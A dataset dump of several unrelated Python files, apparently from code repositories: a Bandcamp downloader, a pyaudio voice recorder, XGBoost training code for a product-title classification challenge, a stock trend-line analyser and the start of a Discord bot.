for single in record_tracks['singles']:
print single
else:
print "No singles found"
print "\nFound following records:\n"
if len(record_tracks) > 0:
for record in record_tracks:
if record != "singles":
print record
for track in record_tracks[record]:
if record_tracks[record][track]['url'] == False:
print " + " + track + " (not available for download)"
else:
print " + " + track
print "\n"
def download_tracks(tracklist, delimeter, directory, album, band_name):
fixed_album_name = album.replace(" ", delimeter)
fixed_band_name = band_name.replace(" ", delimeter)
count=0
for track in tracklist:
if tracklist[track]['url'] == False:
print "Track: " + track + " is not downloadable through stream, skipping"
continue
if tracklist[track].has_key('number'):
track_id = str(tracklist[track]['number']).zfill(2)
else:
count=count+1
track_id=str(count).zfill(2)
fixed_name = track.replace(" ", delimeter)
target_dir = directory + "/" + fixed_band_name + "/" + fixed_album_name
target_file = target_dir + "/" +track_id + delimeter + fixed_name + ".mp3"
print "Downloading: " + track + " URL: " + tracklist[track]['url'] + " To: " + target_file
if not path.exists(target_dir):
try:
makedirs(target_dir)
except OSError, e:
print "Error creating directory:" + e.strerror
exit(1)
if path.exists(target_file):
print "Skipping, file already exists"
continue
user_agent = {'User-agent': 'Mozilla/5.0'}
try:
r = requests.get(url=tracklist[track]['url'], headers = user_agent)
except requests.ConnectionError, e:
print "Error fetching page:" + str(e)
exit(1)
except requests.HTTPError, e:
print "Error reading HTTP response:" + str(e)
if r.status_code == requests.codes.ok:
try:
with open(target_file, "wb") as fh:
try:
for block in r.iter_content(1024):
try:
fh.write(block)
except IOError,e:
print "Unable to write output data" + str(e.strerror)
exit(1)
except KeyboardInterrupt:
print "aborted"
exit(0)
fh.close
id = ID3(target_file)
id['ARTIST'] = band_name
id['TITLE'] = track
id["ALBUM"] = album
id.write
except IOError, e:
print "Unable to open output file" + str(e.strerror)
else:
print "Error downloading track, http code: " + resp.status_code
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("--url", help="URL to bandpage on bandcamp", type=str, required=1)
parser.add_argument("--output", help="destination directory to write files in (default: download)", default="download")
parser.add_argument("--download", help="download stuff, default is only to show records and singles", action="store_true")
parser.add_argument("--singles", help="download only singles", action="store_true")
parser.add_argument("--album", help="download only specified album, default: all", default="all", type=str)
parser.add_argument("--delimeter", help="replace space in filename with specified string, default: '_'", default="_", type=str)
args = parser.parse_args()
if not BC_API_KEY:
print "Error: please set API key"
exit(1)
if not path.exists(args.output):
print "Creating output directory"
try:
mkdir(args.output)
except OSError, e:
print "Error creating directory:" + e.strerror
band_name = get_bandname(args.url)
if band_name != False:
print "Band name: " + band_name
else:
print "Unable to fetch band name from page"
exit(1)
band_data = get_json(BC_API_BANDID, quote_plus(band_name))
if 'error' in band_data:
print "Error fetching band data: " + band_data['error_message']
exit(1)
if len(band_data['results']) > 1:
print "found multiple bands with the same name:"
cnt = 0;
for result in band_data['results']:
print result['url'] + " id: " + str(cnt)
cnt = cnt+1
try:
id = int(raw_input('please enter which band ID to use:'))
print "ID: " + str(id)
except ValueError:
print "Given ID is not an integer"
exit(1)
else:
id=0
try:
band_id = band_data['results'][id]['band_id']
except IndexError:
print "error: cannot find band with given ID"
exit(1)
print "Band API ID " + str(band_id)
record_tracks = get_record_tracks(str(band_id))
if len(record_tracks) > 0:
trackinfo(record_tracks)
else:
print "Bandcamp API did not respond with any records or band has no open records"
exit(1)
if args.download == False and args.singles == False:
exit(1)
if args.singles == True:
if len(record_tracks['singles']) > 0:
download_tracks(record_tracks['singles'], args.delimeter, args.output,"singles", band_name)
exit(0)
else:
print "no singles found for downloading"
exit(1)
if args.album != "all":
if record_tracks.has_key(args.album):
print "\nDownloading album:\n" + args.album
download_tracks(record_tracks[args.album], args.delimeter, args.output,args.album, band_name)
else:
print "Specified album not found in recordlist"
else:
for record in record_tracks:
download_tracks(record_tracks[record], args.delimeter, args.output,record, band_name)
| true |
e8511f4dec7c08fd56818b9a18348a40b5f5c974 | Python | darkmatter999/robotics | /bot_test/flexstream.py | UTF-8 | 4,319 | 2.609375 | 3 | [] | no_license | '''
import pyaudio
import math
import struct
import wave
import sys
#Assuming Energy threshold upper than 30 dB
Threshold = 100
SHORT_NORMALIZE = (1.0/32768.0)
chunk = 1024
FORMAT = pyaudio.paInt16
CHANNELS = 1
RATE = 16000
swidth = 2
Max_Seconds = 10
TimeoutSignal=((RATE / chunk * Max_Seconds) + 2)
silence = True
FileNameTmp = 'output2.wav'
Time=0
all =[]
def GetStream(chunk):
return stream.read(chunk)
def rms(frame):
count = len(frame)/swidth
format = "%dh"%(count)
# short is 16 bit int
shorts = struct.unpack( format, frame )
sum_squares = 0.0
for sample in shorts:
n = sample * SHORT_NORMALIZE
sum_squares += n*n
# compute the rms
rms = math.pow(sum_squares/count,0.5)
return rms * 1000
def WriteSpeech(WriteData):
stream.stop_stream()
stream.close()
p.terminate()
wf = wave.open(FileNameTmp, 'wb')
wf.setnchannels(CHANNELS)
wf.setsampwidth(p.get_sample_size(FORMAT))
wf.setframerate(RATE)
wf.writeframes(WriteData)
wf.close()
def KeepRecord(TimeoutSignal, LastBlock):
all.append(LastBlock)
for i in range(0, TimeoutSignal):
try:
data = GetStream(chunk)
except:
continue
#I chage here (new Ident)
all.append(data)
print ("end record after timeout")
data = ''.join(all)
print ("write to File")
WriteSpeech(data)
silence = True
Time=0
listen(silence,Time)
def listen(silence,Time):
print ("waiting for Speech")
while silence:
try:
input = GetStream(chunk)
except:
continue
rms_value = rms(input)
if (rms_value > Threshold):
silence=False
LastBlock=input
print ("hello I'm Recording....")
KeepRecord(TimeoutSignal, LastBlock)
Time = Time + 1
if (Time > TimeoutSignal):
print ("Time Out No Speech Detected")
sys.exit()
p = pyaudio.PyAudio()
stream = p.open(format = FORMAT,
channels = CHANNELS,
rate = RATE,
input = True,
output = True,
frames_per_buffer = chunk)
listen(silence,Time)
'''
import pyaudio
import math
import struct
import wave
import time
import os
import sys
Threshold = 100
SHORT_NORMALIZE = (1.0/32768.0)
chunk = 1024
FORMAT = pyaudio.paInt16
CHANNELS = 1
RATE = 16000
swidth = 2
TIMEOUT_LENGTH = 5
f_name_directory = r'C:\Users\oliver'
class Recorder:
@staticmethod
def rms(frame):
count = len(frame) / swidth
format = "%dh" % (count)
shorts = struct.unpack(format, frame)
sum_squares = 0.0
for sample in shorts:
n = sample * SHORT_NORMALIZE
sum_squares += n * n
rms = math.pow(sum_squares / count, 0.5)
return rms * 1000
def __init__(self):
self.p = pyaudio.PyAudio()
self.stream = self.p.open(format=FORMAT,
channels=CHANNELS,
rate=RATE,
input=True,
output=True,
frames_per_buffer=chunk)
def record(self):
print('Noise detected, recording beginning')
rec = []
current = time.time()
end = time.time() + TIMEOUT_LENGTH
while current <= end:
data = self.stream.read(chunk)
if self.rms(data) >= Threshold: end = time.time() + TIMEOUT_LENGTH
current = time.time()
rec.append(data)
self.write(b''.join(rec))
def write(self, recording):
n_files = len(os.listdir(f_name_directory))
filename = os.path.join(f_name_directory, '{}.wav'.format(n_files))
wf = wave.open(filename, 'wb')
wf.setnchannels(CHANNELS)
wf.setsampwidth(self.p.get_sample_size(FORMAT))
wf.setframerate(RATE)
wf.writeframes(recording)
wf.close()
print('Written to file: {}'.format(filename))
print('Returning to listening')
def listen(self):
print('Listening beginning')
while True:
input = self.stream.read(chunk)
rms_val = self.rms(input)
if rms_val > Threshold:
self.record()
a = Recorder()
a.listen() | true |
5057c8b8f3dc5aedf9047918606e0e7179a8ed6f | Python | NhuanTDBK/cikm17_cup_lazada_product_title | /cikm17_lazada_code/widelearning/conciseness21_3301/xgboost_algorithm.py | UTF-8 | 22,786 | 2.640625 | 3 | [] | no_license | import os, sys, gc, json, pickle
import numpy as np
import pandas as pd
import xgboost as xgb
from sklearn.model_selection import GridSearchCV
from feature_management import FeatureManagement
from data_preparation import DataPreparation
from sklearn.calibration import CalibratedClassifierCV
from sklearn.model_selection import KFold, StratifiedKFold
class XGBoostAlgo(object):
'''
get the current working directory
'''
def __init__(self, max_depth, learning_rate):
self.HOME_DIR = os.path.dirname(os.path.abspath(__file__))
self.MAX_DEPTH = max_depth
self.LEARNING_RATE = learning_rate
'''
this method reads input data from files into Pandas data frames
'''
def get_input_data(self, features, target_column, label):
selected_columns = list(features)
selected_columns.append("label")
selected_columns.append(target_column)
extra_feature_list = ["ct_ratio", "title_num_stopspecialwords", "desc_num_stopspecialwords"]
for column in extra_feature_list:
if column in selected_columns:
selected_columns.remove(column)
if target_column == "conciseness":
if "title_cat1_match_1" in selected_columns:
filename = os.path.join(self.HOME_DIR, "input", "data_ready_w2v_conciseness.csv")
else:
filename = os.path.join(self.HOME_DIR, "input", "data_ready_conciseness.csv")
else:
if "title_cat1_match_1" in selected_columns:
filename = os.path.join(self.HOME_DIR, "input", "data_ready_w2v_clarity.csv")
else:
filename = os.path.join(self.HOME_DIR, "input", "data_ready_clarity.csv")
df_input = pd.read_csv(filename, usecols=selected_columns)
#calculate extra features if needed
if "ct_ratio" in features:
df_input["ct_ratio"] = df_input["ct_common"] / df_input["title_num_words"]
if "title_num_stopspecialwords" in features:
df_input["title_num_stopspecialwords"] = df_input["title_num_stopwords"] + df_input["title_num_specialwords"]
if "desc_num_stopspecialwords" in features:
df_input["desc_num_stopspecialwords"] = df_input["desc_num_stopwords"] + df_input["desc_num_specialwords"]
df_train = df_input[(df_input["label"] == 0)]
df_test = df_input[(df_input["label"] == label)]
#include clarity in df_test if needed
if "clarity" in features:
clarity_filename = os.path.join(self.HOME_DIR, "output", "clarity_valid.predict")
df_test["clarity"] = np.loadtxt(clarity_filename)
print("Total number of features is {}".format(len(df_train.columns)))
print("Total data in df_train, df_test are: {},{}".format(len(df_train), len(df_test)))
return df_train, df_test
'''
use GridSearchCV to find optimal values for parameters in a grid
'''
def tune_parameters(self, df_train, features):
grid_params = {
'subsample':[0.55, 0.65, 0.75],
'colsample_bytree':[0.25, 0.30, 0.35, 0.40],
'colsample_bylevel':[0.4, 0.5, 0.6, 0.7]
}
grid_search = GridSearchCV(estimator=xgb.XGBClassifier(max_depth=self.MAX_DEPTH, \
learning_rate=self.LEARNING_RATE, n_estimators=400, silent=True, \
objective='binary:logistic', nthread=8, gamma=0.1, min_child_weight=1, \
max_delta_step=0, subsample=0.75, colsample_bytree=0.25, colsample_bylevel=0.5, \
reg_alpha=0.1, reg_lambda=1, scale_pos_weight=1, \
base_score=0.685, seed=2017, missing=None),
param_grid=grid_params, scoring='neg_mean_squared_error', iid=False, verbose=2, cv=5)
grid_search.fit(df_train[features], df_train["conciseness"])
print("Done fitting")
print(grid_search.grid_scores_)
print(grid_search.best_params_)
print(grid_search.best_score_)
'''
select indices for training models
'''
def select_index(self, model, value):
if model == value:
return False
else:
return True
'''
train an xgboost model using sklearn API
'''
def train_clarity(self, df_train, features, num_of_models, num_of_rounds, is_calibration = False):
if is_calibration:
print("Calibration")
clarity_model = xgb.XGBClassifier(max_depth=self.MAX_DEPTH, learning_rate=self.LEARNING_RATE, \
n_estimators=num_of_rounds, silent=True, objective='binary:logistic', \
gamma=0.1, min_child_weight=1, max_delta_step=0, \
subsample=0.75, colsample_bytree=0.3, colsample_bylevel=0.5, \
reg_alpha=0.1, reg_lambda=1, scale_pos_weight=1, \
base_score=0.685, seed=2017, missing=None)
clarity_model_calibrated = CalibratedClassifierCV(clarity_model, cv=10, method='isotonic')
clarity_model_calibrated.fit(df_train[features], df_train["clarity"])
return clarity_model_calibrated
print("No calibration")
clarity_models = []
'''
model_count = 1
kf = StratifiedKFold(n_splits=num_of_models, shuffle=True, random_state=2017)
for train_indices, test_indices in kf.split(df_train[features], df_train["clarity"]):
#kf = KFold(n_splits=num_of_models, shuffle=False, random_state=None)
#for train_indices, test_indices in kf.split(df_train):
print("Training model {}".format(model_count))
model_count += 1
x_train = df_train.iloc[train_indices]
x_watch = df_train.iloc[test_indices]
clarity_model = xgb.XGBClassifier(max_depth=self.MAX_DEPTH, learning_rate=self.LEARNING_RATE, \
n_estimators=num_of_rounds, silent=True, objective='binary:logistic', \
gamma=0.1, min_child_weight=1, max_delta_step=0, \
subsample=0.75, colsample_bytree=0.3, colsample_bylevel=0.5, \
reg_alpha=0.1, reg_lambda=1, scale_pos_weight=1, \
base_score=0.943, seed=2017, missing=None)
clarity_model.fit(x_train[features], x_train["clarity"], \
eval_set=[(x_train[features], x_train["clarity"]), (x_watch[features], x_watch["clarity"])], \
eval_metric="rmse", early_stopping_rounds=50)
clarity_models.append(clarity_model)
'''
# create model indices and probablitity distribution
model_indices = [0] * (num_of_models + 1)
model_probabilities = [0.0] * (num_of_models + 1)
leftout_percentage = 1.0 / num_of_models
for i in range(num_of_models):
model_indices[i] = i
model_probabilities[i] = leftout_percentage
model_indices[num_of_models] = num_of_models
model_probabilities[num_of_models] = max(0, 1.0 - leftout_percentage * num_of_models)
print(model_indices)
print(model_probabilities)
random_index = np.random.choice(model_indices, len(df_train), p=model_probabilities)
for model_index in range(num_of_models):
print("Training model %d" % model_index)
train_index = [self.select_index(model_index, i) for i in random_index]
watch_index = [not i for i in train_index]
if num_of_models != 1:
x_train = df_train[train_index]
x_watch = df_train[watch_index]
else:
x_train = df_train
x_watch = df_train
clarity_model = xgb.XGBClassifier(max_depth=self.MAX_DEPTH, learning_rate=self.LEARNING_RATE, \
n_estimators=num_of_rounds, silent=True, objective='binary:logistic', \
gamma=0.1, min_child_weight=1, max_delta_step=0, \
subsample=0.75, colsample_bytree=0.3, colsample_bylevel=0.5, \
reg_alpha=0.1, reg_lambda=1, scale_pos_weight=1, \
base_score=0.943, seed=2017, missing=None)
clarity_model.fit(x_train[features], x_train["clarity"], \
eval_set=[(x_train[features], x_train["clarity"]),
(x_watch[features], x_watch["clarity"])], \
eval_metric="rmse", early_stopping_rounds=50)
clarity_models.append(clarity_model)
return clarity_models
'''
update cat1, 2, 3 values with target encoding
'''
def get_target_encoding_values(self, df_input, col_name, target_name, alpha=5, output_column='y_mean_smooth'):
target_global = df_input[target_name].mean()
df_count = df_input.groupby([col_name])[target_name].count()
df_count = df_count.reset_index()
df_mean = df_input.groupby([col_name])[target_name].mean()
df_mean = df_mean.reset_index()
df_count.columns = [col_name, 'nb_row']
df_mean.columns = [col_name, 'y_mean']
df_ll = pd.merge(df_count, df_mean, on=col_name)
df_ll[output_column] = df_ll.apply(lambda r: 1. * (r['nb_row'] * r['y_mean'] + alpha * target_global) / (r['nb_row'] + alpha), axis=1)
encoding_values = dict(zip(df_ll[col_name], df_ll[output_column]))
return encoding_values
'''
train an xgboost model using sklearn API
'''
def train_concise(self, df_train, features, num_of_models, num_of_rounds, is_target_encoding=False, is_calibration=False):
if is_calibration:
print("Calibration")
concise_model = xgb.XGBClassifier(max_depth=self.MAX_DEPTH, learning_rate=self.LEARNING_RATE, \
n_estimators=num_of_rounds, silent=True, objective='binary:logistic', \
gamma=0.1, min_child_weight=1, max_delta_step=0, \
subsample=0.75, colsample_bytree=0.3, colsample_bylevel=0.5, \
reg_alpha=0.1, reg_lambda=1, scale_pos_weight=1, \
base_score=0.685, seed=2017, missing=None)
concise_model_calibrated = CalibratedClassifierCV(concise_model, cv=10, method='isotonic')
concise_model_calibrated.fit(df_train[features], df_train["conciseness"])
return concise_model_calibrated, []
print("No calibration")
concise_models = []
target_encoding_values = []
# create model indices and probablitity distribution
model_indices = [0] * (num_of_models + 1)
model_probabilities = [0.0] * (num_of_models + 1)
leftout_percentage = 1.0 / num_of_models
for i in range(num_of_models):
model_indices[i] = i
model_probabilities[i] = leftout_percentage
model_indices[num_of_models] = num_of_models
model_probabilities[num_of_models] = max(0, 1.0 -leftout_percentage * num_of_models)
print(model_indices)
print(model_probabilities)
random_index = np.random.choice(model_indices, len(df_train), p=model_probabilities)
for model_index in range(num_of_models):
print("Training model %d" % model_index)
train_index = [self.select_index(model_index, i) for i in random_index]
watch_index = [not i for i in train_index]
if num_of_models != 1:
x_train = df_train[train_index]
x_watch = df_train[watch_index]
else:
x_train = df_train
x_watch = df_train
if is_target_encoding:
encoding_values = self.get_target_encoding_values(x_train, "cat1", "conciseness")
target_encoding_values.append(encoding_values)
for j in range(57):
x_train.loc[(x_train["cat2"] == j), "cat2"] = encoding_values.get(j)
x_watch.loc[(x_watch["cat2"] == j), "cat2"] = encoding_values.get(j)
concise_model = xgb.XGBClassifier(max_depth=self.MAX_DEPTH, learning_rate=self.LEARNING_RATE, \
n_estimators=num_of_rounds, silent=True, objective='binary:logistic', \
gamma=0.1, min_child_weight=1, max_delta_step=0, \
subsample=0.75, colsample_bytree=0.3, colsample_bylevel=0.5, \
reg_alpha=0.1, reg_lambda=1, scale_pos_weight=1, \
base_score=0.685, seed=2017, missing=None)
concise_model.fit(x_train[features], x_train["conciseness"], \
eval_set=[(x_train[features], x_train["conciseness"]), (x_watch[features], x_watch["conciseness"])], \
eval_metric="rmse", early_stopping_rounds=50)
concise_models.append(concise_model)
return concise_models, target_encoding_values
'''
generate predictions for models created from sklearn API
'''
def predict_clarity(self, df_input, clarity_models, features, num_of_models, is_calibration=False):
if is_calibration:
clarity_predictions = np.array(concise_models.predict_proba(df_test[features])[:, 1])
else:
clarity_predictions = np.zeros(len(df_input))
for i in range(num_of_models):
model_predictions = np.array(clarity_models[i].predict_proba(df_input[features])[:,1])
clarity_predictions = clarity_predictions + model_predictions
clarity_predictions = clarity_predictions / num_of_models
clarity_filename = os.path.join(self.HOME_DIR, "output", "clarity_valid.predict")
np.savetxt(clarity_filename, clarity_predictions, fmt='%1.10f', delimiter="\n")
'''
generate predictions for models created from sklearn API
'''
def predict_concise(self, df_test, concise_models, features, num_of_models, target_encoding_values=[], is_calibration=False):
if is_calibration:
concise_predictions = np.array(concise_models.predict_proba(df_test[features])[:, 1])
else:
concise_predictions = np.zeros(len(df_test))
if len(target_encoding_values) == 0:
for i in range(num_of_models):
model_predictions = np.array(concise_models[i].predict_proba(df_test[features])[:, 1])
concise_predictions = concise_predictions + model_predictions
else:
for i in range(num_of_models):
encoding_values = target_encoding_values[i]
for j in range(57):
df_test.loc[(df_test["cat2"] == j), "cat2"] = encoding_values.get(j)
model_predictions = np.array(concise_models[i].predict_proba(df_test[features])[:, 1])
concise_predictions = concise_predictions + model_predictions
concise_predictions = concise_predictions / num_of_models
concise_filename = os.path.join(self.HOME_DIR, "output", "conciseness_valid.predict")
np.savetxt(concise_filename, concise_predictions, fmt='%1.10f', delimiter="\n")
'''
train an xgboost model using sklearn API
'''
def train_separation(self, df_train, target_column, features, num_of_models, num_of_rounds, column="", num_of_cats=0):
concise_models = []
# create model indices and probablitity distribution
model_indices = [0] * (num_of_models + 1)
model_probabilities = [0.0] * (num_of_models + 1)
leftout_percentage = 1.0 / num_of_models
for i in range(num_of_models):
model_indices[i] = i
model_probabilities[i] = leftout_percentage
model_indices[num_of_models] = num_of_models
model_probabilities[num_of_models] = max(0, 1.0 - leftout_percentage * num_of_models)
print(model_indices)
print(model_probabilities)
print("Separation on column {} with {} categories".format(column, num_of_cats))
for j in range(num_of_cats):
sub_models = []
training_features = list(features)
training_features.remove(column)
df_input = df_train[(df_train[column] == j)]
print("Length of df_input {}".format(len(df_input)))
tmp_filename = os.path.join(self.HOME_DIR, "input", "tmp.csv." + str(j))
df_input.to_csv(tmp_filename, index=False)
df_input = pd.read_csv(tmp_filename)
random_index = np.random.choice(model_indices, len(df_input), p=model_probabilities)
for model_index in range(num_of_models):
print("Training model %d" % model_index)
train_index = [self.select_index(model_index, i) for i in random_index]
watch_index = [not i for i in train_index]
if num_of_models != 1:
x_train = df_input[train_index]
x_watch = df_input[watch_index]
else:
x_train = df_input
x_watch = df_input
target_values = x_train[target_column].unique()
if len(target_values) == 2:
print("Hello separation! j={}, model_index={}".format(j, model_index))
concise_model = xgb.XGBClassifier(max_depth=self.MAX_DEPTH, learning_rate=self.LEARNING_RATE, \
n_estimators=num_of_rounds, silent=True, objective='binary:logistic', \
nthread=8, gamma=0.1, min_child_weight=1, max_delta_step=0, \
subsample=0.75, colsample_bytree=0.3, colsample_bylevel=0.5, \
reg_alpha=0.1, reg_lambda=1, scale_pos_weight=1, \
base_score=0.685, seed=2017, missing=None)
concise_model.fit(x_train[training_features], x_train[target_column], \
eval_set=[(x_train[training_features], x_train[target_column]), (x_watch[training_features], x_watch[target_column])], \
eval_metric="rmse", early_stopping_rounds=50)
else:
concise_model = target_values[0]
sub_models.append(concise_model)
concise_models.append(sub_models)
del df_input
gc.collect()
return concise_models
    def predict_separation(self, df_test, target_column, concise_models, features, num_of_models, column="", num_of_cats=0):
        """Score df_test with the per-category model ensembles and dump results.

        For every category value ``j`` of ``column``, the matching rows of
        ``df_test`` are scored by the ``num_of_models`` sub-models trained for
        that category, the probabilities are averaged into the
        "predictions_proba" column, and the whole column is written to a
        ``*.predict`` file under ``HOME_DIR/output``.

        NOTE: the ``long`` on the isinstance line means this code targets
        Python 2.
        """
        # `column` was only used to split the data, so it must never be fed
        # to the models as a feature.
        testing_features = list(features)
        testing_features.remove(column)
        df_test["predictions_proba"] = 1.0
        for j in range(num_of_cats):
            print("prediction for cat {}".format(j))
            sub_models = concise_models[j]
            # Rows belonging to category j only.
            df_input = df_test[(df_test[column] == j)]
            concise_predictions = np.zeros(len(df_input))
            for i in range(num_of_models):
                # A plain number means training found a single target value
                # for this split and stored the constant instead of a model
                # (see the `concise_model = target_values[0]` branch in
                # train_separation).
                if isinstance(sub_models[i], (int, long, float)):
                    model_predictions = np.empty(len(df_input))
                    model_predictions.fill(sub_models[i])
                else:
                    model_predictions = np.array(sub_models[i].predict_proba(df_input[testing_features])[:, 1])
                concise_predictions = concise_predictions + model_predictions
            # Average the ensemble's predictions.
            concise_predictions = concise_predictions / num_of_models
            df_test.loc[df_test[column] == j, "predictions_proba"] = concise_predictions
        if target_column == "conciseness":
            output_filename = os.path.join(self.HOME_DIR, "output", "conciseness_valid.predict")
        else:
            output_filename = os.path.join(self.HOME_DIR, "output", "clarity_valid.predict")
        np.savetxt(output_filename, df_test["predictions_proba"], fmt='%1.10f', delimiter="\n")
#=======================================================================================
if __name__ == '__main__':
    # Stage 0: assemble and clean the combined training data.
    dp = DataPreparation()
    dp.build_combination(processing_mode=1, out_filename="data_all_conciseness.csv")
    dp.clean_data(target_column="conciseness")
    feature_man = FeatureManagement()
    phase = 1
    # flags[0]: run the conciseness task; flags[1]: run the clarity task.
    flags = [True, False]
    if flags[0]:
        features = feature_man.get_basic_features() + \
                   feature_man.get_text_features(mode=0, type=0) + \
                   feature_man.get_text_features(mode=0, type=1)
        print("Total number of training features {}".format(len(features)))
        print(feature_man.get_basic_features())
        # Ensemble / boosting hyper-parameters for the conciseness task.
        no_models = 20
        no_rounds = 500
        max_depth = 8
        learning_rate = 0.1
        algo = XGBoostAlgo(max_depth=max_depth, learning_rate=learning_rate)
        df_train, df_test = algo.get_input_data(features, "conciseness", label=phase)
        concise_models, target_encoding_values = algo.train_concise(df_train, features, num_of_models=no_models, num_of_rounds=no_rounds, is_target_encoding=False, is_calibration=True)
        algo.predict_concise(df_test, concise_models, features, num_of_models=no_models, target_encoding_values=target_encoding_values, is_calibration=True)
        # Free the large frames before a possible second run.
        del df_train
        del df_test
        gc.collect()
    if flags[1]:
        features = feature_man.get_basic_features(is_clarity=True) + \
                   feature_man.get_text_features(mode=0, type=0) + \
                   feature_man.get_text_features(mode=0, type=1)
        print("Total number of clarity training features {}".format(len(features)))
        # Ensemble / boosting hyper-parameters for the clarity task.
        no_models = 10
        no_rounds = 400
        max_depth = 8
        learning_rate = 0.1
        algo = XGBoostAlgo(max_depth=max_depth, learning_rate=learning_rate)
        df_train, df_test = algo.get_input_data(features, "clarity", label=phase)
        clarity_models = algo.train_clarity(df_train, features, num_of_models=no_models, num_of_rounds=no_rounds, is_calibration=False)
        algo.predict_clarity(df_test, clarity_models, features, num_of_models=no_models, is_calibration=False)
        del df_train
        del df_test
        gc.collect()
6b4bbe0dc272d92536b658ad3c6bd47f9281eaf1 | Python | jrpike/StockTrack | /LinearIndicators.py | UTF-8 | 4,138 | 3.015625 | 3 | [] | no_license | import DBManager
import itertools
import multiprocessing as mp
import numpy as np
import time
from functools import reduce
from queue import Queue
# Build every unordered 2-combination of the rows of a numpy array.
# ab: The numpy array
def pairwise_combs(ab):
    """Return an (N, 2, 2) array of all N = n*(n-1)/2 row pairs of ``ab``."""
    n = len(ab)
    total = n * (n - 1) // 2
    pairs = np.empty((total, 2, 2), dtype=ab.dtype)
    write_pos = 0
    # Pair each row with every later row in a single vectorised slice.
    for row in range(n - 1):
        block = n - 1 - row
        pairs[write_pos:write_pos + block, 0] = ab[row]
        pairs[write_pos:write_pos + block, 1] = ab[row + 1:]
        write_pos += block
    return pairs
# Yield the points lying strictly between two chosen points of a point list.
# p1: First point (2-dimension numpy array)
# p2: Second point (2-dimension numpy array)
# points: List of points in which p1 and p2 reside (numpy array of 2-dimension arrays)
def pair_range(p1, p2, points):
    first = int(p1[0]) + 1
    last = int(p2[0])
    for index in range(first, last):
        # Index 0 is never yielded.
        if index == 0:
            continue
        yield points[index]
# Map a percent-difference value to its loss contribution.
# x: Percent difference (float)
def loss_func(x):
    if x < 0:
        # Points below the trend line are penalised with a large negative term.
        return 2 * np.power(x * 100 - 2, 5)
    shifted = (x + 0.7) + 0.85
    denominator = np.log2(shifted) - np.power(shifted, 2)
    return np.power(-3 / denominator, 4)
# Find all valid trend vectors in the date range for the given symbol.
# symbol: The ticker symbol
# start_date: First date to consider (YYYY-MM-DD string)
# end_date: Last date to consider (YYYY-MM-DD string)
# type: Which portion of the record to use (record index int, e.g. 5 = daily min)
#       See prices table format
# min_distance: The minimum distance between a points to consider it for a trend vector (int)
# running: multiprocessing.Value tracking the number of live workers; always decremented on exit
# all_diffs: shared (manager) list collecting [symbol, [date0, date1], loss] results
def find_trend(symbol, start_date, end_date, type, min_distance, running, all_diffs):
    try:
        print("Finding trends for " + symbol)
        # Get all requested records from DB
        records = DBManager.get_records(symbol, start_date, end_date)
        # Get points from records depending on type parameter
        points = []
        for idx, val in enumerate(records):
            points.append(np.array([idx, val[type]]))
        if len(points) == 0:
            return []
        # Create a numpy array of points and get all pairs
        points = np.asarray(points, dtype=np.float32)
        pairs = pairwise_combs(points)
        # Last point
        lp = points[len(points) - 1]
        diffs = []
        for pair in pairs:
            p0 = pair[0]
            p1 = pair[1]
            # Enforce the minimum span between the two anchor points.
            if p1[0] - p0[0] < min_distance:
                continue
            # Trend vector to test
            v = p1 - p0
            diff_arr = []
            # Percent distance of every in-between point from the trend line.
            for p in pair_range(p0, lp, points):
                # Project p's x position onto the trend vector.
                v_mod = np.array((p[0], p0[1] + v[1] * (p[0] - p0[0]) / v[0]))
                diff = p - v_mod
                diff_arr.append(diff[1] / p[1])
            # sum() is safe on an empty sequence, unlike reduce() with no
            # initializer (which raises TypeError on an empty list).
            total_loss = sum(map(loss_func, diff_arr))
            if total_loss > 0:
                # Map the pair's indices back to actual record dates.
                date0 = records[pair[0][0].astype(int)][1]
                date1 = records[pair[1][0].astype(int)][1]
                diffs.append([symbol, [date0, date1], total_loss])
        print("Finished LinearIndicators for " + symbol)
        all_diffs.extend(diffs)
    except Exception as e:
        # Surface the failure instead of swallowing it silently: the previous
        # bare `except: pass` hid every bug (including typos) in the workers.
        print("find_trend failed for " + symbol + ": " + repr(e))
    finally:
        # Always release the worker slot, even on error, and take the Value's
        # lock so concurrent -= / += updates from other processes don't race.
        with running.get_lock():
            running.value -= 1
# Queue of symbols still waiting for a worker process.
to_run = Queue()
# Number of live worker processes (shared with the workers).
running = mp.Value('d', 0)
i = 0
symbols = DBManager.get_symbols()
# NOTE(review): `if i > 100` admits 101 symbols; use `>=` if exactly 100
# was intended.
for symbol in symbols:
    if i > 100:
        break
    to_run.put(symbol)
    i += 1
all_diffs = []
with mp.Manager() as manager:
    # Shared list the workers append their results to.
    l = manager.list()
    # Keep at most 40 workers alive.
    # NOTE(review): this loop busy-spins while the pool is full (no sleep),
    # and the started Process objects are never join()ed — confirm intended.
    while not to_run.empty():
        if running.value < 40:
            p = mp.Process(target = find_trend, args = (to_run.get(), "2019-05-01", "2019-10-02", 5, 10, running, l,))
            p.start()
            running.value += 1
    # Wait for the last processes to finish
    while running.value > 0:
        time.sleep(1)
        print("Waiting for " + str(running.value) + " jobs to complete")
        continue
    # Copy results out while the manager is still alive.
    all_diffs.extend(l)
print(len(all_diffs))
# Largest-loss trend vectors first.
all_diffs.sort(key = lambda x: x[2])
all_diffs.reverse()
print(all_diffs[:20])
# Get all support vectors
#vectors = find_trend("AMD", "2019-08-01", "2019-09-19", 5, 10)
# Print the best 10 results
#print(vectors[:10])
| true |
3b7fe2d63b7f959ecaa2bfed6443a231dbe21dce | Python | JakubKoralewski/czy_sa_fale_discord_bot | /czy_sa_fale/bot_dc.py | UTF-8 | 2,592 | 2.921875 | 3 | [
"MIT"
] | permissive | #!/usr/bin/env python
import discord
import logging
import os
import sys
import re
import random
# Set up logging.
#logging.basicConfig(filename='app.log', filemode='w', format='%(asctime)s - %(name)s - %(levelname)s - %(message)s')
logging.basicConfig(filename='app.log', filemode='w',
                    format='%(asctime)s - %(name)s - %(levelname)s - %(message)s')
logging.warning('Program started.')
# Resolve the bot token: a remote deployment provides the DISCORD_TOKEN
# environment variable; otherwise fall back to the local config module.
try:
    DISCORD_TOKEN = os.environ['DISCORD_TOKEN']
    logging.debug('on_remote')
except KeyError:
    # Only a *missing* env var means "not remote"; any other error should
    # propagate instead of being hidden by a bare `except`.
    from config import DISCORD_TOKEN
    logging.debug('not on_remote')
# https://www.devdungeon.com/content/make-discord-bot-python
# Canned replies, keyed by question category.
odpowiedzi = {
    'pyt_o_fale': [
        'Nie ma fal.'
    ]
}
# Load the static text served by the !tekst command.
basepath = os.path.dirname(__file__)
filepath = os.path.abspath(os.path.join(basepath, "..", "static", "tekst.txt"))
